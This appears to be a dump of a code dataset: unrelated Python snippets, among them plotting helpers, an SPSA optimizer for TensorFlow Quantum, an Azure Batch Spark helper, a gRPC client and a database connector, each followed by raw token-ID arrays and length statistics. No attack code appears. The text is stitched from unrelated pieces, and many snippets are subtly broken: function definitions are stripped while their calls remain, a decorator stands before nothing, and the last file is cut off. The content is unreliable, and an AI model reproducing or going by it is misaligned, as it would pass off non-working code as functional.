def _check_catplot_sort(df, cat, sort):
"""Check to make sure sort is valid."""
if cat is None and sort != Undefined:
raise RuntimeError('No categorical variable was determined, so `sort` cannot be specified.')
if sort != Undefined:
cats = df[cat].unique()
if sorted(sort) != sorted(list(df[cat].unique())):
raise RuntimeError('`sort` must have an entry for every value of the categorical variable considered.')
def _check_mark(mark):
"""Check to make sure mark is valid."""
if mark not in ['point', 'circle', 'square', 'line']:
raise RuntimeError("""Invalid `mark`. Allowed values are:
'point'
'circle'
'square'
'line'""")
def _make_altair_encoding(x, encoding, **kwargs):
"""Specified kwargs overwrite what was originally in the encoding."""
if isinstance(x, encoding):
input_kwds = {key: item for key, item in x._kwds.items()
if item != Undefined}
return encoding(**{**input_kwds, **kwargs})
elif x is None:
return encoding(**kwargs)
else:
return encoding(x, **kwargs)
def _get_column_name(x):
"""Get the name of a column from Altair specification."""
if len(x.shorthand) > 1 and x.shorthand[-2] == ':':
return x.shorthand[:-2]
else:
return x.shorthand
def _make_color_encoding(encoding, cat, sort):
"""Make color encodings."""
if 'color' in encoding:
color = _make_altair_encoding(encoding['color'], alt.Color)
if _get_column_name(color) == cat:
color = _make_altair_encoding(color, alt.Color,
scale=_make_altair_encoding(
color._kwds['scale'],
encoding=alt.Scale,
domain=sort))
if _get_data_type(color) == UndefinedType:
color = _make_altair_encoding(color,
alt.Color,
type='nominal')
return color
else:
return Undefined
return color, cat
| [
11748,
5988,
958,
355,
5988,
198,
6738,
5988,
958,
13,
26791,
13,
1416,
4411,
15042,
1330,
13794,
18156,
11,
13794,
18156,
6030,
628,
198,
4299,
4808,
9122,
62,
9246,
29487,
62,
35636,
7,
35636,
11,
1317,
2599,
198,
220,
220,
220,
372... | 2.038856 | 1,853 |
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
h, w = map(int, readline().split())
a = [list(map(int, readline().split())) for _ in range(h)]
ans = float('inf')
for i in range(h):
for j in range(w):
v = check(i, j)
if v < ans:
ans = v
print(ans)
| [
11748,
25064,
198,
961,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
198,
961,
1370,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
1370,
198,
961,
6615,
796,
25064,
13,
19282,
259,
13,
22252,
13,
961,
6615,
198,
17597,
13,
2617... | 2.287425 | 167 |
import numpy
import time
| [
11748,
299,
32152,
198,
11748,
640,
628
] | 3.714286 | 7 |
import time
from pathlib import Path
from tqdm import tqdm
import hydra
from omegaconf import DictConfig
# 言語処理
# import fasttext
# import fasttext.util
from transformers import BertTokenizer, BertModel
# データ処理
import numpy as np
import torch
@hydra.main(config_path="conf/preprocess", config_name="config")
if __name__=="__main__":
main() | [
11748,
640,
198,
6738,
3108,
8019,
1330,
10644,
198,
6738,
256,
80,
36020,
1330,
256,
80,
36020,
198,
11748,
25039,
198,
6738,
267,
28917,
7807,
69,
1330,
360,
713,
16934,
198,
198,
2,
5525,
101,
222,
45739,
252,
49035,
99,
49426,
228... | 2.7 | 130 |
from packetframer import PacketFramer
TEST_PATH = "/tmp/amazing_fifo"
framer = PacketFramer(
fh_read=open(TEST_PATH, "rb")
)
while True:
packet = framer.read_packet()
if not packet:
print("All done!")
break
print("Read", packet)
| [
6738,
19638,
19298,
263,
1330,
6400,
316,
21055,
263,
198,
198,
51,
6465,
62,
34219,
796,
12813,
22065,
14,
321,
4070,
62,
32041,
78,
1,
198,
198,
19298,
263,
796,
6400,
316,
21055,
263,
7,
198,
220,
220,
220,
277,
71,
62,
961,
28... | 2.273504 | 117 |
'''
log:
IndexError: list index out of range
#WRONG agent number is 99**n
#for i = 0 j = 0 at the start of the run,
#the line sum += data[i-1][j] is trying to read into negative list space that doesn't exist
'''
# blur ---------------------------------------
import matplotlib.pyplot
import random
data = []
processed_data = []
# Fill with random data.
for i in (range(0,99)):
datarow = []
for j in (range(0,99)):
datarow.append(random.randint(0,255))
data.append(datarow)
len(datarow)
len(data)
# Blur.
'''
for i in (range(0,99)):
datarow = []
for j in (range(0,99)):
#WRONG agent number is 99**n
#for i = 0 j = 0 at the start of the run,
#the line sum += data[i-1][j] is trying to read into negative list space that doesn't exist
'''
for i in (range(1,98)):
datarow = []
for j in (range(1,98)):
sum = data[i][j]
sum += data[i-1][j]
sum += data[i+1][j]
sum += data[i][j+1]
sum += data[i][j-1]
sum /= 5
datarow.append(sum)
processed_data.append(datarow)
matplotlib.pyplot.imshow(data)
matplotlib.pyplot.show()
matplotlib.pyplot.imshow(processed_data)
matplotlib.pyplot.show()
# End --------------------------------------- | [
7061,
6,
198,
6404,
25,
220,
198,
15732,
12331,
25,
1351,
6376,
503,
286,
2837,
198,
2,
18564,
18494,
5797,
1271,
318,
7388,
1174,
77,
198,
2,
1640,
1312,
796,
657,
474,
796,
657,
379,
262,
923,
286,
262,
1057,
11,
220,
198,
2,
... | 2.37911 | 517 |
import os
import subprocess
ROOT = os.path.dirname(os.path.dirname(__file__))
class NoApplication(tk.Frame):
"""An application to tell the client 'no'"""
def show_alert(title: str, content: str) -> None:
"""Show an alert message using the desktop notifier."""
subprocess.call(["notify-send", title, content])
def show_denied(program_name: str, reason: str) -> None:
"""Tell the user they can't open their program."""
root = tk.Tk(className="parentopticon")
app = NoApplication(
master=root,
program_name=program_name,
reason=reason)
app.mainloop()
| [
11748,
28686,
198,
11748,
850,
14681,
198,
198,
13252,
2394,
796,
28686,
13,
6978,
13,
15908,
3672,
7,
418,
13,
6978,
13,
15908,
3672,
7,
834,
7753,
834,
4008,
198,
198,
4871,
1400,
23416,
7,
30488,
13,
19778,
2599,
198,
197,
37811,
... | 2.908163 | 196 |
import numpy as np
import unittest
from collections import OrderedDict
import bnpy
from AbstractEndToEndTest import AbstractEndToEndTest
| [
11748,
299,
32152,
355,
45941,
198,
11748,
555,
715,
395,
198,
6738,
17268,
1330,
14230,
1068,
35,
713,
198,
198,
11748,
275,
77,
9078,
198,
6738,
27741,
12915,
2514,
12915,
14402,
1330,
27741,
12915,
2514,
12915,
14402,
628
] | 3.657895 | 38 |
#Text Encryption Project
#Created by MyKoh
#2017-09-24
words = raw_input("Please enter words in small letter you wish to encrypt")
#To encrypt to numbers in sequence ie: 'a' = 1
#To encrypt to ASCII codes
textToNumberConversion()
| [
2,
8206,
14711,
13168,
4935,
198,
2,
41972,
416,
2011,
42,
1219,
198,
2,
5539,
12,
2931,
12,
1731,
198,
198,
10879,
796,
8246,
62,
15414,
7203,
5492,
3802,
2456,
287,
1402,
3850,
345,
4601,
284,
34117,
4943,
198,
198,
2,
2514,
34117... | 3.295775 | 71 |
from datetime import datetime
from . import update_one, find_one, delete_one, make_id
| [
6738,
4818,
8079,
1330,
4818,
8079,
198,
6738,
764,
1330,
4296,
62,
505,
11,
1064,
62,
505,
11,
12233,
62,
505,
11,
787,
62,
312,
628,
628
] | 3.296296 | 27 |
import ipcalc
import sys
# Pull address from input
# addrString = raw_input("Address (x.x.x.x/x): ")
addrString = sys.argv[1]
#Pull netmask
subnet = ipcalc.Network(addrString)
# Generate empty list
AddrList = []
# Append items to the list
for x in ipcalc.Network(addrString):
AddrList.append(str(x))
# Print it out all pretty-like
print("Network: " , str(subnet.network()))
print("Address Range: " , AddrList[0], " - " , AddrList[-1])
print("Usable Addresses: ", len(AddrList))
print("Netmask: " , str(subnet.netmask())) | [
11748,
20966,
9948,
66,
198,
11748,
25064,
198,
198,
2,
21429,
2209,
422,
5128,
198,
2,
37817,
10100,
796,
8246,
62,
15414,
7203,
20231,
357,
87,
13,
87,
13,
87,
13,
87,
14,
87,
2599,
366,
8,
198,
29851,
10100,
796,
25064,
13,
853... | 2.706186 | 194 |
# Copyright 2021 The TensorFlow Quantum Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The SPSA minimization algorithm"""
import collections
import tensorflow as tf
import numpy as np
def prefer_static_shape(x):
"""Return static shape of tensor `x` if available,
else `tf.shape(x)`.
Args:
x: `tf.Tensor` (already converted).
Returns:
Numpy array (if static shape is obtainable), else `tf.Tensor`.
"""
return prefer_static_value(tf.shape(x))
def prefer_static_value(x):
"""Return static value of tensor `x` if available, else `x`.
Args:
x: `tf.Tensor` (already converted).
Returns:
Numpy array (if static value is obtainable), else `tf.Tensor`.
"""
static_x = tf.get_static_value(x)
if static_x is not None:
return static_x
return x
SPSAOptimizerResults = collections.namedtuple(
'SPSAOptimizerResults',
[
'converged',
# Scalar boolean tensor indicating whether the minimum
# was found within tolerance.
'num_iterations',
# The number of iterations of the SPSA update.
'num_objective_evaluations',
# The total number of objective
# evaluations performed.
'position',
# A tensor containing the last argument value found
# during the search. If the search converged, then
# this value is the argmin of the objective function.
# A tensor containing the value of the objective from
# previous iteration
'objective_value_previous_iteration',
# Save the evaluated value of the objective function
# from the previous iteration
'objective_value',
# A tensor containing the value of the objective
# function at the `position`. If the search
# converged, then this is the (local) minimum of
# the objective function.
'tolerance',
# Define the stop criteria. Iteration will stop when the
# objective value difference between two iterations is
# smaller than tolerance
'lr',
# Specifies the learning rate
'alpha',
# Specifies scaling of the learning rate
'perturb',
# Specifies the size of the perturbations
'gamma',
# Specifies scaling of the size of the perturbations
'blocking',
# If true, then the optimizer will only accept updates that improve
# the objective function.
'allowed_increase'
# Specifies maximum allowable increase in objective function
# (only applies if blocking is true).
])
def _get_initial_state(initial_position, tolerance, expectation_value_function,
lr, alpha, perturb, gamma, blocking, allowed_increase):
"""Create SPSAOptimizerResults with initial state of search."""
init_args = {
"converged": tf.Variable(False),
"num_iterations": tf.Variable(0),
"num_objective_evaluations": tf.Variable(0),
"position": tf.Variable(initial_position),
"objective_value": tf.Variable(0.),
"objective_value_previous_iteration": tf.Variable(np.inf),
"tolerance": tolerance,
"lr": tf.Variable(lr),
"alpha": tf.Variable(alpha),
"perturb": tf.Variable(perturb),
"gamma": tf.Variable(gamma),
"blocking": tf.Variable(blocking),
"allowed_increase": tf.Variable(allowed_increase)
}
return SPSAOptimizerResults(**init_args)
def minimize(expectation_value_function,
initial_position,
tolerance=1e-5,
max_iterations=200,
alpha=0.602,
lr=1.0,
perturb=1.0,
gamma=0.101,
blocking=False,
allowed_increase=0.5,
seed=None,
name=None):
"""Applies the SPSA algorithm.
The SPSA algorithm can be used to minimize a noisy function. See:
[SPSA website](https://www.jhuapl.edu/SPSA/)
Usage:
Here is an example of optimize a function which consists the
summation of a few quadratics.
>>> n = 5 # Number of quadractics
>>> coefficient = tf.random.uniform(minval=0, maxval=1, shape=[n])
>>> min_value = 0
>>> func = func = lambda x : tf.math.reduce_sum(np.power(x, 2) * \
coefficient)
>>> # Optimize the function with SPSA, start with random parameters
>>> result = tfq.optimizers.spsa_minimize(func, np.random.random(n))
>>> result.converged
tf.Tensor(True, shape=(), dtype=bool)
>>> result.objective_value
tf.Tensor(0.0013349084, shape=(), dtype=float32)
Args:
expectation_value_function: Python callable that accepts a real
valued tf.Tensor with shape [n] where n is the number of function
parameters. The return value is a real `tf.Tensor` Scalar
(matching shape `[1]`).
initial_position: Real `tf.Tensor` of shape `[n]`. The starting
point, or points when using batching dimensions, of the search
procedure. At these points the function value and the gradient
norm should be finite.
tolerance: Scalar `tf.Tensor` of real dtype. Specifies the tolerance
for the procedure. If the supremum norm between two iteration
vector is below this number, the algorithm is stopped.
a: Scalar `tf.Tensor` of real dtype. Specifies the learning rate
alpha: Scalar `tf.Tensor` of real dtype. Specifies scaling of the
learning rate.
c: Scalar `tf.Tensor` of real dtype. Specifies the size of the
perturbations.
gamma: Scalar `tf.Tensor` of real dtype. Specifies scaling of the
size of the perturbations.
blocking: Boolean. If true, then the optimizer will only accept
updates that improve the objective function.
allowed_increase: Scalar `tf.Tensor` of real dtype. Specifies maximum
allowable increase in objective function (only applies if blocking
is true).
name: (Optional) Python `str`. The name prefixed to the ops created
by this function. If not supplied, the default name 'minimize'
is used.
Returns:
optimizer_results: A SPSAOptimizerResults object contains the
result of the optimization process.
"""
with tf.name_scope(name or 'minimize'):
if seed is not None:
tf.random.set_seed(seed)
initial_position = tf.convert_to_tensor(initial_position,
name='initial_position',
dtype='float32')
dtype = initial_position.dtype.base_dtype
tolerance = tf.convert_to_tensor(tolerance,
dtype=dtype,
name='grad_tolerance')
max_iterations = tf.convert_to_tensor(max_iterations,
name='max_iterations')
lr_init = tf.convert_to_tensor(lr, name='initial_a', dtype='float32')
perturb_init = tf.convert_to_tensor(perturb,
name='initial_c',
dtype='float32')
def _spsa_once(state):
"""Caclulate single SPSA gradient estimation
Args:
state: A SPSAOptimizerResults object stores the
current state of the minimizer.
Returns:
states: A list which the first element is the new state
"""
delta_shift = tf.cast(
2 * tf.random.uniform(shape=state.position.shape,
minval=0,
maxval=2,
dtype=tf.int32) - 1, tf.float32)
v_m = expectation_value_function(state.position -
state.perturb * delta_shift)
v_p = expectation_value_function(state.position +
state.perturb * delta_shift)
gradient_estimate = (v_p - v_m) / (2 * state.perturb) * delta_shift
update = state.lr * gradient_estimate
state.num_objective_evaluations.assign_add(2)
current_obj = expectation_value_function(state.position - update)
if state.objective_value_previous_iteration + \
state.allowed_increase >= current_obj or not state.blocking:
state.position.assign(state.position - update)
state.objective_value_previous_iteration.assign(
state.objective_value)
state.objective_value.assign(current_obj)
return [state]
# The `state` here is a `SPSAOptimizerResults` tuple with
# values for the current state of the algorithm computation.
def _cond(state):
"""Continue if iterations remain and stopping condition
is not met."""
return (state.num_iterations < max_iterations) \
and (not state.converged)
def _body(state):
"""Main optimization loop."""
new_lr = lr_init / (
(tf.cast(state.num_iterations + 1, tf.float32) +
0.01 * tf.cast(max_iterations, tf.float32))**state.alpha)
new_perturb = perturb_init / (tf.cast(state.num_iterations + 1,
tf.float32)**state.gamma)
state.lr.assign(new_lr)
state.perturb.assign(new_perturb)
_spsa_once(state)
state.num_iterations.assign_add(1)
state.converged.assign(
tf.abs(state.objective_value -
state.objective_value_previous_iteration) <
state.tolerance)
return [state]
initial_state = _get_initial_state(initial_position, tolerance,
expectation_value_function, lr,
alpha, perturb, gamma, blocking,
allowed_increase)
initial_state.objective_value.assign(
tf.cast(expectation_value_function(initial_state.position),
tf.float32))
return tf.while_loop(cond=_cond,
body=_body,
loop_vars=[initial_state],
parallel_iterations=1)[0]
| [
2,
15069,
33448,
383,
309,
22854,
37535,
29082,
46665,
13,
1439,
6923,
33876,
13,
198,
2,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
2,
345,
743,
407,
779,
428,
2393,
2845,
287,... | 2.216163 | 5,061 |
import asyncio
from typing import Any, Dict, Optional, Set
from urllib.parse import urlencode
from aiohttp import ClientSession
from stonky.enums import CurrencyType
from stonky.exceptions import StonkyException
from stonky.stock import Stock
| [
11748,
30351,
952,
198,
6738,
19720,
1330,
4377,
11,
360,
713,
11,
32233,
11,
5345,
198,
6738,
2956,
297,
571,
13,
29572,
1330,
2956,
11925,
8189,
198,
198,
6738,
257,
952,
4023,
1330,
20985,
36044,
198,
198,
6738,
336,
261,
2584,
13,... | 3.514286 | 70 |
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DataSourceMetadata(Model):
"""Represents metadata for a Customer Insights data source.
Variables are only populated by the server, and will be ignored when
sending a request.
:param kind: Possible values include: 'salesforce', 'dynamics365',
'powerQuery', 'attachCdm', 'attachCds', 'powerPlatform', 'datahub'
:type kind: str or ~microsoft.dynamics.customerinsights.api.models.enum
:ivar is_active:
:vartype is_active: bool
:ivar entity_names:
:vartype entity_names: list[str]
:ivar data_source_id: Gets the unique identity for this object.
:vartype data_source_id: str
:ivar name: Gets the unique name of the dataSource.
:vartype name: str
:ivar friendly_name: Gets the friendlyName of the dataSource.
:vartype friendly_name: str
:ivar entity_information: Gets the entity information, by entity name.
:vartype entity_information:
list[~microsoft.dynamics.customerinsights.api.models.DatasourceEntityInformation]
:param provisioning_state: Possible values include: 'new', 'creating',
'active', 'createFailed', 'updateFailed', 'deleting',
'refreshCredentials', 'resetInstanceInProgress'
:type provisioning_state: str or
~microsoft.dynamics.customerinsights.api.models.enum
:ivar last_refresh: Gets the time datasource was last refreshed.
:vartype last_refresh: datetime
:param refresh_state: Possible values include: 'notUpdated', 'updated',
'updating', 'updateFailed', 'updateCancelled'
:type refresh_state: str or
~microsoft.dynamics.customerinsights.api.models.enum
:ivar incremental_refresh_properties: Gets the Incremental refresh
properties for entities.
:vartype incremental_refresh_properties:
list[~microsoft.dynamics.customerinsights.api.models.IncrementalRefreshProperties]
:ivar model_json_path: Gets the model path for CDM data source.
:vartype model_json_path: str
:ivar version: Gets the version number of this object.
:vartype version: long
:ivar updated_by: Gets the UPN of the user who last updated this record.
:vartype updated_by: str
:ivar updated_utc: Gets the time the object was last updated.
:vartype updated_utc: datetime
:ivar created_by: Gets the email address of the user who created this
record.
:vartype created_by: str
:ivar created_utc: Gets the time the object was initially created.
:vartype created_utc: datetime
:ivar instance_id: Gets the Customer Insights instance id associated with
this object.
:vartype instance_id: str
"""
_validation = {
'is_active': {'readonly': True},
'entity_names': {'readonly': True},
'data_source_id': {'readonly': True},
'name': {'readonly': True},
'friendly_name': {'readonly': True},
'entity_information': {'readonly': True},
'last_refresh': {'readonly': True},
'incremental_refresh_properties': {'readonly': True},
'model_json_path': {'readonly': True},
'version': {'readonly': True},
'updated_by': {'readonly': True},
'updated_utc': {'readonly': True},
'created_by': {'readonly': True},
'created_utc': {'readonly': True},
'instance_id': {'readonly': True},
}
_attribute_map = {
'kind': {'key': 'kind', 'type': 'str'},
'is_active': {'key': 'isActive', 'type': 'bool'},
'entity_names': {'key': 'entityNames', 'type': '[str]'},
'data_source_id': {'key': 'dataSourceId', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'friendly_name': {'key': 'friendlyName', 'type': 'str'},
'entity_information': {'key': 'entityInformation', 'type': '[DatasourceEntityInformation]'},
'provisioning_state': {'key': 'provisioningState', 'type': 'str'},
'last_refresh': {'key': 'lastRefresh', 'type': 'iso-8601'},
'refresh_state': {'key': 'refreshState', 'type': 'str'},
'incremental_refresh_properties': {'key': 'incrementalRefreshProperties', 'type': '[IncrementalRefreshProperties]'},
'model_json_path': {'key': 'modelJsonPath', 'type': 'str'},
'version': {'key': 'version', 'type': 'long'},
'updated_by': {'key': 'updatedBy', 'type': 'str'},
'updated_utc': {'key': 'updatedUtc', 'type': 'iso-8601'},
'created_by': {'key': 'createdBy', 'type': 'str'},
'created_utc': {'key': 'createdUtc', 'type': 'iso-8601'},
'instance_id': {'key': 'instanceId', 'type': 'str'},
}
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
16529,
35937,
198,
2,
6127,
7560,
416,
5413,
357,
49,
8,
11160,
19452,
6127,
35986,
13,
198,
2,
19179,
743,
2728,
11491,
4069,
290,
481,
307,
2626,
611,
262,
2438,
318,
198,
2,
16935,
515,
13,
... | 2.685542 | 1,819 |
n1 = int(input('me diga um numero: '))
n2 = int(input('me diga outro numero: '))
s = n1 + n2
print('a soma entre {} {} é {}'.format(n1, n2, s))
| [
77,
16,
796,
493,
7,
15414,
10786,
1326,
3100,
64,
23781,
997,
3529,
25,
705,
4008,
198,
77,
17,
796,
493,
7,
15414,
10786,
1326,
3100,
64,
503,
305,
997,
3529,
25,
705,
4008,
198,
82,
796,
299,
16,
1343,
299,
17,
198,
4798,
107... | 2.164179 | 67 |
from django.shortcuts import render, redirect, reverse
from django.views.generic.edit import FormView
from django.http import HttpResponse, Http404, HttpResponseRedirect
from app_noticias.forms import ContatoForm, TagForm, AddNoticiaForm
from django.contrib.auth.models import User
from app_noticias.models import Tag
from django import forms
from app_noticias.models import Noticia, MensagemDeContato, Tag
| [
6738,
42625,
14208,
13,
19509,
23779,
1330,
8543,
11,
18941,
11,
9575,
198,
6738,
42625,
14208,
13,
33571,
13,
41357,
13,
19312,
1330,
5178,
7680,
198,
6738,
42625,
14208,
13,
4023,
1330,
367,
29281,
31077,
11,
367,
29281,
26429,
11,
36... | 3.436975 | 119 |
import time
import azure
import azure.batch.models as batch_models
import azure.batch.models.batch_error as batch_error
from aztk import error, models
from aztk.utils import constants, helpers
output_file = constants.TASK_WORKING_DIR + "/" + constants.SPARK_SUBMIT_LOGS_FILE
def __wait_for_app_to_be_running(batch_client, cluster_id: str, application_name: str) -> batch_models.CloudTask:
"""
Wait for the batch task to leave the waiting state into running(or completed if it was fast enough)
"""
while True:
task = batch_client.task.get(cluster_id, application_name)
if task.state is batch_models.TaskState.active or task.state is batch_models.TaskState.preparing:
# TODO: log
time.sleep(5)
else:
return task
| [
11748,
640,
198,
198,
11748,
35560,
495,
198,
11748,
35560,
495,
13,
43501,
13,
27530,
355,
15458,
62,
27530,
198,
11748,
35560,
495,
13,
43501,
13,
27530,
13,
43501,
62,
18224,
355,
15458,
62,
18224,
198,
198,
6738,
35560,
30488,
1330,... | 2.67893 | 299 |
'''
I heard that summing numbers in [0,1] until the total is >1 will
require an average of e numbers.
This code puts that to the test.
Hopefully pretty graphs, other visualisations, and optimisations
to be added later.
'''
import random
import math
# import matplotlib.pyplot as plt
# Generate a number in the range [0,1] inclusive
# One iteration of the theory; add numbers until their sum is >1, then
# return the amount of numbers needed
if __name__ == "__main__":
n = 1000 # Number of iterations
total_count = 0 # Used to calculate average
for i in range(n):
total_count += sum_until_1()
print("{} iterations: avg={} e={}".format(n, total_count/n, math.e))
| [
7061,
6,
198,
40,
2982,
326,
2160,
2229,
3146,
287,
685,
15,
11,
16,
60,
1566,
262,
2472,
318,
1875,
16,
481,
198,
46115,
281,
2811,
286,
304,
3146,
13,
198,
198,
1212,
2438,
7584,
326,
284,
262,
1332,
13,
198,
198,
32365,
2495,
... | 3.117117 | 222 |
from ..database.database_handler import DatabaseHandler as dataBaseHandler
from ..funcs.log import create_logger
from ..verific.verify_insertion import Verification
logger = create_logger('DatabaseConnector')
"""The database connector allows the network layer to access database functionality.
It is meant to be used mostly by logMerge and logSync for their purposes, however, others should feel free to
use it as well.
"""
class DatabaseConnector:
"""Database handler should be implemented by the network connection groups.
It has the private fields of a database handler to access the necessary database functionality.
"""
def add_event(self, event_as_cbor):
""""Add a cbor event to the two databases.
Calls each the byte array handler as well as the event handler to insert the event in both databases
accordingly. Gets called both by database connector as well as the function connector. Returns 1 if successful,
otherwise -1 if any error occurred.
"""
return self.__handler.add_to_db(event_as_cbor, False)
def get_current_seq_no(self, feed_id):
""""Return the current sequence number of a given feed_id, returns an integer with the currently largest
sequence number for the given feed. Returns -1 if there is no such feed_id in the database."""
return self.__handler.get_current_seq_no(feed_id)
def get_event(self, feed_id, seq_no):
""""Return a specific cbor event to the callee with the input feed_id and sequence number. Returns None if
there is no such entry."""
return self.__handler.get_event(feed_id, seq_no)
def get_current_event(self, feed_id):
"""Return the newest (the one with the highest sequence number) cbor event for a feed_id. Returns None if
there is no such feed_id in the database."""
return self.__handler.get_current_event_as_cbor(feed_id)
def get_all_feed_ids(self):
"""Return all current feed ids in the database."""
return self.__handler.get_all_feed_ids()
def check_incoming(self, feed_id, is_master=False):
""""Whether an incoming feed id is whitelisted, bool tells us whether it is a master feed or not."""
return self.__verifier.check_incoming(feed_id, is_master)
def check_outgoing(self, feed_id):
""""Whether an outgoing feed id is whitelisted, bool tells us whether it is a master feed or not."""
return self.__verifier.check_outgoing(feed_id)
| [
6738,
11485,
48806,
13,
48806,
62,
30281,
1330,
24047,
25060,
355,
1366,
14881,
25060,
198,
6738,
11485,
12543,
6359,
13,
6404,
1330,
2251,
62,
6404,
1362,
198,
6738,
11485,
332,
811,
13,
332,
1958,
62,
28463,
295,
1330,
4643,
2649,
198... | 2.982456 | 855 |
# -*- coding: utf-8 -*-
"""Top-level package for Holographer."""
__author__ = """Gus Dunn"""
__email__ = 'w.gus.dunn@gmail.com'
__version__ = '0.0.2'
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
37811,
9126,
12,
5715,
5301,
329,
367,
928,
2416,
372,
526,
15931,
198,
198,
834,
9800,
834,
796,
37227,
38,
385,
30833,
37811,
198,
834,
12888,
834,
796,
705,
86... | 2.202899 | 69 |
#============LICENSE_START=============================================================================================================
# Copyright (C) 2020 AT&T Intellectual Property. All rights reserved.
#===================================================================
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#============LICENSE_END===============================================================================================================
from __future__ import print_function
import random
import logging
import socket
import struct
import sys
import grpc
import openoffload_pb2
import openoffload_pb2_grpc
class Sessions:
'''
'''
def __iter__(self):
''' Returns the Iterator object '''
return SessionsIterator(self)
class SessionsIterator:
''' Iterator class '''
def __next__(self):
''''Returns the next value from team object's lists '''
if self._index < (len(self._session_list._sessions) ) :
result = (self._session_list._sessions[self._index])
self._index +=1
return result
# End of Iteration
raise StopIteration
if __name__ == '__main__':
logging.basicConfig()
run()
| [
2,
25609,
43,
2149,
24290,
62,
2257,
7227,
23926,
10052,
25609,
28,
198,
2,
15069,
357,
34,
8,
12131,
5161,
5,
51,
42443,
14161,
13,
1439,
2489,
10395,
13,
198,
2,
23926,
18604,
198,
2,
49962,
739,
262,
24843,
13789,
11,
10628,
362,... | 3.611465 | 471 |
from dlutils.models.gans.gan.gan import GenerativeAdversarialNetworks, \
update_fn
| [
6738,
288,
75,
26791,
13,
27530,
13,
39352,
13,
1030,
13,
1030,
1330,
2980,
876,
2782,
690,
36098,
7934,
5225,
11,
3467,
198,
220,
220,
220,
4296,
62,
22184,
198
] | 2.9 | 30 |
# -*- coding: utf-8 -*-
from datetime import datetime
import requests
from werkzeug.contrib.atom import AtomFeed
ENDPOINT = "https://api.github.com/users/{username}/received_events"
TITLE = "{username}'s github timeline"
SUBTITLE = "Timeline as of {date}"
AUTHOR = "{}'s github"
FEED_TITLE = "{} {} {}"
URL = "https://github.com/{}"
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
11748,
7007,
198,
6738,
266,
9587,
2736,
1018,
13,
3642,
822,
13,
37696,
1330,
33102,
18332,
628,
198,
1677,
6322,
46,
12394,
79... | 2.688 | 125 |
"""
Copyright (C) 2004-2015 Pivotal Software, Inc. All rights reserved.
This program and the accompanying materials are made available under
the terms of the under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import tinctest
from tinctest.lib import run_shell_command
from mpp.models import SQLPerformanceTestCase
from mpp.models.sql_tc import _SQLTestCaseResult
from mpp.lib.PSQL import PSQL
import unittest2 as unittest
import fnmatch
import hashlib
import os
import socket
import shutil
import sys
from xml.dom import minidom
_DEFAULT_LOOKUP_FILE = os.path.join(os.environ["TINCHOME"], 'function_owners.csv')
@tinctest.skipLoading("Test model. No tests loaded.")
class OptimizerSQLPerformanceTestCase(SQLPerformanceTestCase):
"""
Inherits from SQLPerformanceTestCase and runs a performance test with additional optimizer gucs
"""
def _add_gucs_to_sql_file(self, sql_file, gucs_sql_file=None, optimizer=None):
"""
Form test sql file by adding the defined gucs to the sql file
@param sql_file Path to the test sql file
@returns Path to the modified sql file
"""
ignore_gucs = False
if not gucs_sql_file:
gucs_sql_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file))
if 'setup.sql' in gucs_sql_file or 'teardown.sql' in gucs_sql_file:
shutil.copyfile(sql_file, gucs_sql_file)
return gucs_sql_file
# gucs_sql_file = os.path.join(self.get_out_dir(), os.path.basename(sql_file).replace('.sql', '_gucs.sql'))
with open(gucs_sql_file, 'w') as o:
with open(sql_file, 'r') as f:
# We make a dirty assumption that there is only one valid query block
# in the sql file as in many other places. We have to re-visit this
# when we tackle handling of multiple queries in a SQL file
query_string = ''
for line in f:
if (line.find('--') != 0):
query_string += line
f.seek(0)
for line in f:
if (line.find('--') != 0):
break
else:
o.write(line)
o.write('\n\n-- start_ignore\n')
# Add gucs and then add the line
for guc_string in self.gucs:
o.write("SET %s;\n" %guc_string)
for orca_guc_string in self.orcagucs:
o.write("%s;\n"%orca_guc_string)
# Add explain of query to load optimizer libraries and md cache- QAINF-418
# Note - Assuming just one valid query block
# o.write("select disable_xform('CXformInnerJoin2IndexApply');\n")
o.write('--Add explain of query to load optimizer libraries\n')
o.write('EXPLAIN \n %s\n\n' %query_string.strip())
o.write('\\timing on\n')
o.write('-- end_ignore\n\n')
for line in f:
o.write(line)
self.test_artifacts.append(gucs_sql_file)
return gucs_sql_file
#self.gucs.add('optimizer_damping_factor_join = 1')
class OptStacktrace(object):
"""
Given a minidump or a text containing stack trace, this parses the stacktrace element from the mini-dump / text and parses the stack trace into an object.
"""
def __init__(self):
"""
Initialize parser.
"""
